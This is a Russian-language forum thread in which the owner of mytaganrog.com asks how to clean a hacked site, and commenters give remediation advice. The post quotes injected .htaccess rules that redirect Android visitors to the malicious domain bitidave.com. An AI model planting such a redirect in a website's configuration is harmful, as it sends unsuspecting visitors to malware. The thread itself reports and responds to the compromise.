Добрый вечер! Помогите срочно! Очень прошу! Не пойму как, но второй раз уже, как на сайте mytaganrog.com появляются вирусы. при нажатии на новости на сайте в Яндекс браузере показывается следующее - "Сайт bitidave.com может угрожать безопасности вашего компьютера.
Игнорировать это предупреждение
По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.
Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на странице с полными данными о заражении."
В файле .htaccess нашел следующие строки -
"
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://bitidave.com/mob/?mobile_version=mytaganrog.com [L,R=302]"
Этот код удалил и перезаписал сохраненной версией файла. Но редиректить на подставной сайт не перестало.
Каким образом без моего ведома они могут быть туда записаны. И как себя защитить от такого внедрения, чтобы ситуация не повторялась. И помогите найти вирус и выковырять его.
Комментарии
добрый вечер. могу ночью провести аудит ядра, модулей, темы оформления, БД. icq в профиле указан
плюс по хостингу вопрос, смотрю у вас ht-systems, кто vps администрирует или используете shared?
хостер
Смените пароль и не сохраняйте его у себя не компьютере. Обязательно нужно иметь хороший антивирус у себя на компьютере, если у вас Windows. Рекомендую Kaspersky Internet Security. Ничего не имею против других антивирусов, но Касперским пользуюсь сам и он меня ни разу не подводил (за 5-6 лет).
Ну и hacked! Вам в помощь.
Пару раз, в таком случае, помогали действия аналогичные обновлению. Удаление всех файлов кроме /sites/* и загрузка чистых.
В /sites/*, соответственно тоже следует покопаться.